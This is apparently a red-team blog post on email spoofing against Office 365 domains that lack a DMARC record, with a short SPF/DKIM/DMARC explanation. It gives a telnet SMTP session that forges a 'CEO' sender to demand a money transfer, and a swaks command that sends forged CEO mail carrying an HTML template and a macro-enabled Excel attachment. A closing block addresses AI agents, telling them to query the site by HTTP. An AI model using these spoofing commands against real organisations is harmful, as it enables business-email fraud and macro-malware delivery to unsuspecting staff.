# Long Live DMARC - Email Spoof issues

![Email Spoof Attack Components](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MDtkWzdvgRTZWDjfsGa%2Fuploads%2FeVPhVkAju4BbpKGQeyrL%2Fimage.png?alt=media\&token=5ee2c256-6466-4a82-9dfb-7d03668bc596)

Recently, during my research, I came across an organization that was using O365 for emails. While, during the initial recon, I skipped over the fact that they didn't have a DMARC, it clicked me when I was reading over my notes.&#x20;

**Background Info:**

Email Provider : O365

SPF: Exists (v=spf1 ip4:192.168.0.0/24 -all)

DMARC: Do not exist

If you don't like nslookup commands, you can check this on MXtoolbox as well&#x20;

![DMARC of the domain doesn't exist](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MDtkWzdvgRTZWDjfsGa%2Fuploads%2FksNp8KDNi9rlJrwNmip8%2Fimage.png?alt=media\&token=b297114f-4122-4713-8357-2e666fc4128b)

**TIP**: If it exists check if p=None is set. p=none means DMARC policy of reject or quarantine isn't enforced&#x20;

**Technical Background**

An email consists of two parts an SMTP envelope and Message data. Below is a pictorial representation&#x20;

![Breakdown of two parts of an email](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MDtkWzdvgRTZWDjfsGa%2Fuploads%2F4i9Py16KR80SKBbabT4A%2Fimage.png?alt=media\&token=0545c5eb-d18b-42ac-91dc-2f4398630f84)

SPF verifies HELO/EHLO&#x20;

DKIM: Verify the DKIM-signature of the sender&#x20;

DMARC: checks alignment between 'From' and 'Mail From'

![SPF and DKIM verification fields](https://2978447173-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MDtkWzdvgRTZWDjfsGa%2Fuploads%2FKYwmGlKU26bIWXfZDidp%2Fimage.png?alt=media\&token=27035681-8d12-467e-939a-2ee42858e543)

<mark style="background-color:yellow;">In Conclusion, if DMARC isn't present, there is no way to verify the alignment between the 'MAIL FROM' and 'FROM' fields. If the receiving user only sees 'FROM' then an attacker is free to forge anything. Simply put, an attacker can put any email address he likes in the 'FROM' field and the receiving user will see that the email is coming from the forged 'FROM' address.</mark>

**Current Exploitation Methods:**

Quick guides I found on exploiting DMARC not present issue also known as "SPF-BYPASS" are as follows

<https://github.com/Rices/spf-bypass>

<https://o365info.com/how-to-simulate-spoof-e-mail-attack-and-bypass-spf-sender-verification-part2-of-2/>&#x20;

**Info Extract from above methods**&#x20;

**Info Extract from the above methods**&#x20;

So to spoof following actions must be performed&#x20;

Step 1: Buy a domain or configure a subdomain (I'll be using a subdomain: fook.redteam.cafe)

Step 2: Get a VPS that allows SMTP. I'm using DigitalOcean.&#x20;

Step 3: Set the right SPF record on the domain. Example v=spf1 mx a ip4:\<Digital OCEAN IP> -all

Step 4: connect via telnet to the target SMTP server. My target org used office365 so we'll telnet to orgname-com.mail.protection.outlook.com

```
telnet orgname-com.mail.protection.outlook.com 25
```

Step 5: Perform actions as below&#x20;

```
ehlo fook.redteam.cafe
MAIL FROM: attacker@fook.redteam.cafe
RCPT To: victim@orgname.com
data
from: "CEO ORG" <ceo@orgname.com>
to: <victim@orgname.com>
subject: transfer money urgently

Hey send me money at bank account 123456789

.


```

Enjoy the profit&#x20;

**Missing Automation** 🤷‍♂️

So all this is good and everything, but where the hell is automation. As a red teamer, I asked myself these questions

1. Where is automation? Do I send an email by telnet to all my victims? That's boring&#x20;
2. How do I send an HTML email?
3. How do I send an attachment with my email?

After looking at many telnet automation, I was frustrated. I decided to use SWAKS, the Swiss Army knife for emails.

&#x20;Instead of doing loads of telnet, manual encoding of messages, lets run this sweet command and be done

```
./swaks --ehlo fook.redteam.cafe --from attacker@mail.redteam.cafe --to victim@orgname.com --server orgname-com.mail.protection.outlook.com --h-From '"CEO  ORG" <ceo@orgname.com>' --attach-type text/html --attach-body @Mail-Template.html --attach macroexcel.xlsm --attach-type text/html
```

**Is this something new ?**

Probaby not, You must have heard about this 100 years ago.&#x20;

**How can I find more issues in the email delivery system?**

&#x20;Well, there is of course the manual way to `dig` for SPF, DMARC and DKIM. You can also just go to [caniphish.com ](https://caniphish.com)for a quicker way in.&#x20;

**Super Useful Research**

While doing some google-fu, I found two very useful projects to test mail delivery systems.&#x20;

MailSploit - <https://github.com/pwnsdx/Mailsploit>

espoofer - <https://github.com/chenjj/espoofer>

These projects will help you discover issues in mail delivery systems. You may even get a 0 day in your pocket 🤷‍♂️ if you choose the right target. Shhhhh

**References:**

Amazing Blackhat Talk&#x20;

<https://www.blackhat.com/us-20/briefings/schedule/#you-have-no-idea-who-sent-that-email--attacks-on-email-sender-authentication-19902>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.redteam.cafe/phishing/long-live-dmarc-email-spoof-issues.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.